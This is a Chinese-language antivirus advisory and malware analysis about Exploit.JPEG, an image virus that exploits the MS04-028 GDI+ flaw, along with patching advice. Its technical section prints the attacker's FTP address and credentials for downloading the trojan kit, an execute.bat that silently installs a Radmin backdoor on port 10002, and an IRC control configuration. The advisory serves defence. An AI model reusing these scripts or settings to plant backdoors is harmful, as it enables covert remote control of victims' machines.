據金山毒霸反病毒中心監測,到目前為止這種圖片病毒感染的例子還不多,但是這說明利用這個漏洞來傳播的圖片病毒現身了,第一波圖片病毒攻擊已經開始。最為可怕的是,以後還會有各種攻擊出現,不僅會帶木馬病毒,包括一些惡性蠕蟲、破壞數據的病毒都會以圖片病毒作為掩飾來進行破壞。
金山反病毒中心介紹,該圖片病毒利用MS04-028的GDI+漏洞,如果用戶機器沒有打相應補丁,並使用資源管理器瀏覽了該檔案,可能導致用戶機器從連線木馬種植者指定的FTP地址,並從該FTP下載木馬檔案,並運行這些木馬,以達到遠程監控感染機器目的。
專家提醒:用戶應立即打上各種應用程式補丁,如果懷疑機器染毒,電腦用戶可查看機器10002連線埠有無程式訪問,以防木馬病毒偷盜各種密碼。
目前,金山毒霸已經進行了緊急病毒庫升級,可以防殺利用此漏洞製造的圖片病毒。並且免費提供圖片病毒專殺工具(下載地址:http://db.kingsoft.com/special/virtusspecial/JPEG/index.shtml),欲了解更多相關信息請登入http://db.kingsoft.com信息安全網站。
技術資料分析:
病毒名稱:Exploit.JPEG
病毒長度:4098
威脅級別:二級
中文名稱:圖片駭客
病毒別名:
Exploit.Win32.MS04-028.gen[AVP]
受影響系統:未打MS04-028補丁的英文版WinXP SP1
發現時間:9月28日
病毒簡介:
金山反病毒中心介紹,該病毒利用MS04-028的GDI+漏洞,如果用戶機器沒有打相應補丁,並使用資源管理器瀏覽了該檔案,可能導致用戶機器從連線木馬種植者指定的FTP地址,並從該FTP下載木馬檔案,並運行這些木馬,以達到遠程監控感染機器目的
技術細節:
當用戶通過資源管理器瀏覽該檔案後,病毒會利用GDI+漏洞,嘗試溢出執行下載命令。如果溢出失敗,則會導致資源管理器崩潰
如果溢出成功,則病毒嘗試從以下FTP上下載遠程控制檔案
ftp://2××。1××。4×。2×/www/system/檔案包括:
檔案名稱大小
AdmDll.dll90112
Fport.exe114688
ServUStartUpLog.txt 663
VNCHooks.dll 32768
WinRun.dll 1407
WinRun.exe 811008
driver.log 1268
drives.exe24576
execute.bat 150
filter3.ocx 0
irc-u.cfg 1052
irc-u.dat0
irc-u.debug.log16802
irc-u.dll102400
kill.exe 26624
nc.exe 59392
nvsvc.exe241664
nvsvc32.dll 36864
omnithread_rt.dll 45056
peek.exe 34304
raddrv.dll29408
radmin.reg 713
rcrypt.exe26112
reg.exe 40960
uptime.exe 6656
vns.exe 208896
3、運行execute.bat 檔案,通過Radmin遠程管理工具,建立後門,連線埠為10002.
4、會建立一個IRC連線,連線到#FurQ頻道。
0.其他信息:
FTP地址如下:
ftp://209.171.43.27/www/system/
用戶名:bawz
密碼:pagdba
execute.bat 內容如下
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server
IRC配置檔案如下:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d
![Exploit.JPEG網頁 新聞 貼吧 知道 音樂 圖片 視頻 地圖 文庫 百科 進入詞條全站搜尋幫助 ...病毒別名:Exploit.Win32.MS04-028.gen[AVP]處理時間:威脅級別:★★中文名稱:...](/wiki/Exploit.JPEG/8108057){kind=link}